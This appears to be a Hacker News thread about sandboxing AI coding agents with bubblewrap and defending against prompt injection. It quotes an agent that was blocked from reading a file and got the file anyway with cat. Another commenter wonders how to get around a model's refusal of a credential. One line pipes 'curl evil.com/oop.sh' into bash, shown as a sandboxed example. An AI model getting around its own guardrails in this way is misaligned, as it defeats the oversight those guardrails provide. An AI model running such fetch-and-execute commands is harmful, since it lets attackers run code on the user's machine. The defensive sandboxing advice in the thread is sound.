--bind "$HOME/.claude" "$HOME/.claude"
That directory has a bunch of of sensitive stuff in it, most notable the transcripts of all of your previous Claude Code sessions.You may want to take steps to avoid a malicious prompt injection stealing those, since they might contain sensitive data.
> I can’t take that token and run Cloudflare provisioning on your behalf, even if it’s “only” set as an env var (it’s still a secret credential and you’ve shared it in chat). Please revoke/rotate it immediately in Cloudflare.
So clearly they've put some sort of prompt guard in place. I wonder how easy it would be to circumvent it.
I use a lot of ansible to manage infra, and before I learned about ansible-vault, I was moving some keys around unprotected in my lab. Bad hygiene- and no prompt intervening.
Kinda bums me out that there may be circumstances where the model just rejects this even if you for some reason you needed it.
With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.
bwrap --ro-bind image/ / --bind src/ /src ...
Any tools you need in the container are installed in the image you unpack.
Some more tips: Use --unshare-all if you can. Make sure to add --proc and --dev options for a functional container. If you just need network, use both --unshare-all and --share-net together, keeping everything else separate. Make sure to drop any privileges with --cap-drop ALL
Mysql user: test
Password: mypass123
Host: localhost
...
You must not care about those systems that much.
Recently got it working for OpenCode and updated my post.
Someone pointed out to me that having the .git directory mounted read/write in the sandbox could be a problem. So I'm considering only mounting src/ and project metadata (including git) being read only.
You really need to use the `--new-session` parameter, by the way. It's unfortunate that this isn't the default with bwrap.
YOLO mode is so much more useful that it feels like using a different product.
If you understand the risks and how to limit the secrets and files available to the agent - API keys only to dedicated staging environments for example - they can be safe enough.
It doesn't mean we can't try, but one has to understand the nature of the problem. Prompt injection isn't like SQL injection, it's like a phishing attack - you can largely defend against it, but never fully, and at some point the costs of extra protection outweigh the gain.
You're missing the point.
An agent system consists of an LLM plus separate "agentive" software that can a) receive your input and forward it to the LLM; b) receive text output by the LLM in response to your prompt; c) ... do other stuff, all in a loop. The actual model can only ever output text.
No matter what text the LLM outputs, it is the agent program that actually runs commands. The program is responsible for taking the output and interpreting it as a request to "use a tool" (typically, as I understand it, by noticing that the LLM's output is JSON following a schema, and extracting command arguments etc. from it).
Prompt injection is a technique for getting the LLM to output text that is dangerous when interpreted by the agent system, for example, "tool use requests" that propose to run a malicious Bash command.
You can clearly see where the threat occurs if you implement your own agent, or just study the theory of that implementation, as described in previous HN submissions like https://news.ycombinator.com/item?id=46545620 and https://news.ycombinator.com/item?id=45840088 .
I am not sure it is reasonably possible to determine which Bash commands are malicious. This is especially so given the multitude of exploits latent in the systems & software to which Bash will have access in order to do its job.
It's tough to even define "malicious" in a general-purpose way here, given the risk tolerances and types of systems where agents run (e.g. dedicated, container, naked, etc.). A Bash command could be malicious if run naked on my laptop and totally fine if run on a dedicated machine.
> ReadFile ../other-project/thing
> Oh, I'm jailed by default and can't read other-project. I'll cat what I want instead
> !cat ../other-project/thing
It's surreal how often they ask you to run a command they could easily run, and how often they run into their own guardrails and circumvent them
> file writes
> construct a `curl`
I am not a security researcher, but this combination does not align with "safe" to me.
More practically, if you are using a coding agent, you explicitly want it to be able to write new code and execute that code (how else can it iterate?). So even if you block Bash, you still need to give it access to a language runtime, and that language runtime can do ~everything Bash can do. Piping data to and from the LLM, without a runtime, is a totally different, and much limited, way of using LLMs to write code.
Much better to allow full Bash but run in a sandbox that controls file and network access.
And it is simply easier to whitelist directories than individual commands. Unix utilities weren't created with fine-grained capabilities and permissions in mind. Wherever you add a new script or utility to a whitelist, you have to actively think whether any new combination may lead to privileges escalation or unintended effects.
Use the original container, the OS user, chown, chmod, and run agents on copies of original data.
Just no nonsense defaults with a bit of customization.
https://github.com/allen-munsch/bubbleproc
bubbleproc -- curl evil.com/oop.sh | bash
Don't leave prod secrets in your dev env.
Yes that is correct. However, I think embedding bubblewrap in the binary is risky design for the end user.
They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.
Thats helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn’t have this risk if they drove you to invoke Claude with bubblewrap.
Additionally, the pattern using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents- so you get consistency in access controls for all agents.
I hope the desirability of this having consistent access controls across all agents is shared by others. You don’t get that property if you use Claude’s embedded control. There will always be an asterisk about whether your opinion and theirs will be similar with respect to implementation of controls.
Oh, never mind:
> You want to run a binary that will execute under your account’s permissions
Funny enough Bubblewrap is also what Flatpak uses.